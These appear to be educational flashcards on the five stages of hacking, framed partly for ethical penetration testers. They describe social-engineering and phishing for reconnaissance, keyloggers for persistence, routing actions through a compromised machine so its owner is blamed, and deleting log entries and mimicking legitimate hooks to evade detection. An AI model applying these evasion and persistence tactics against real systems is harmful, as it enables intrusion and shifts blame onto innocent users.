Hacking Stages Flashcards

1
Q

What is the initial phase?

A

Reconnaissance is the initial phase. This step involves gathering information to learn as much as possible about the target.

There are two types of information gathering -
Active and Passive

  • Active information gathering requires some level of interaction w/ the target
  • Passive information gathering does not require interaction w/ the target

Passive Ex.

  • If you’re sitting down at a bar and eavesdropping on a business-related conversation that your target is having w/ another individual, this would be qualified as -passive- information gathering, as it requires no direct interaction w/ the target
  • Intercepting communications your target is having w/ another person on a channel (Network attack) is also a form of passive information gathering (generally. There are ways of doing this in which you would interact w/ the target)

Active Ex.

  • Say you’re at the same bar as before, except this time, you buy both your target and the individual they’re speaking with a few drinks and get them drunk in order to more easily extract the information; this would qualify as active information gathering because it requires that you interact w/ the target
  • Another example of active information gathering would be if you were to implement a phishing scheme. You send a link to your target via email or otherwise, they click the link and give up their IP address and possibly reveal some substantial information.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What is the second phase?

A

Scanning:
During this stage, hackers use the information they gathered in the reconnaissance phase to scan the target network for more specific information.

Ex. for understanding the difference between the reconnaissance phase and scanning phase:
- Say you are conducting a penetration test on a company; what are the first pieces of information that you would need to know in order to begin scanning the entry point into their network? For instance, if you wanted to test the configuration of a firewall (what can pass through and what cannot), the very least you would need to know is an IP address (or more likely, multiple IP addresses) relevant to that firewall.
Or maybe you’d need something along the lines of an address of which the servers are physically located.
These two particular pieces of information are ones that you would acquire during the reconnaissance phase, and are what you will now act upon in the scanning phase to acquire more specific and applicable data.

In easier terms:

Reconnaissance phase (first stage):
- acquire as much relative information and data as possible
Scanning phase (second stage):
- using the information you've acquired in the reconnaissance phase, gather even more specific information
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is the third phase?

A

Gaining access:
This phase involves finding an entry point to the target’s operating system or an application on the system and using it to perform the attack.

  • this is the stage in which the actual attack takes place (you exploit the vulnerabilities you’ve discovered in the previous stages)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What is the fourth phase?

A

Maintaining access:
This is the phase in which hackers attempt to maintain their admin/root privileges so they can continue to utilize the system.

  • once you’ve broken into a system, your next step will likely be to elevate your own privileges so you can do even more within the system.
  • you’ll need to ensure that you have persistent access to the system/device you’ve compromise because if your connection is broken for any reason and you have no way of easily reentering the system, then that is a considerable amount of time lost
  • you can install tools onto a compromised device that will give you persistent access and will continuously gather data from the machine which can then be used later on to possibly compromise other devices within the network, internet accounts, etc.
  • Ex: a key logger can be installed which will harvest what the user of the compromised device types into the keyboard, so you can learn more about what that particular user is doing on that particular device
  • you can use the machine you’ve compromised as a proxy within the company. This way, you can use the machine to perform actions elsewhere and if those actions are every traced, the will only be traced back to the machine you’ve used as a proxy and the owner of that machine (if you cover your tracks very well and leave absolutely no evidence to any outside involvement, then there’ll more than likely be a heavy amount of suspicion placed on that machine’s owner, as well as legal repercussions)
    v v v v
    As an ethical hacker, make sure to document these things so that you don’t get anyone into legal trouble and after a penetration test is concluded, do not forget to include these things in your reports, as to clear all personnel of any liability.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What is the fifth phase?

A

Clearing tracks:
This is the final phase. During this step, hackers attempt to hide their activities on the system. They do everything they can to cover their tracks and avoid being caught.

  • does not refer only to when your work is done. You should clear your tracks throughout all prior stages. It’s especially important that once you’ve breached a system and created some sort of permanent access that you remain undetected. If you are detected, the target company will likely conduct an investigation, discover your entry point, and close it. Any machines that you’ve infected up to the point of your detecting will probably be purged and just like that, you’ve lost all access.
  • erase all tracks as fast as possible, and if possible, generate no tracks at all

Actions that can be taken to clear your tracks are as follows (but not limited to):
- clearing log files. Just note that you shouldn’t purge everything within a log file, just entries that serve to prove your presence in a system
- you could masquerade your activities behind legitimate programs. By mimicking the activities and behavior of legitimate programs and incorporating your own actions, you could hide yourself.
Ex. Erman’s key logger masquerades itself behind legitimate programs by using the same set of hooks that practically any legitimate program that uses keyboard shortcuts would use. SO, if the antivirus were to detect it as a key logger, it would also have to detect basically all the programs on the system that use keyboard shortcuts

How well did you know this?
1
Not at all
2
3
4
5
Perfectly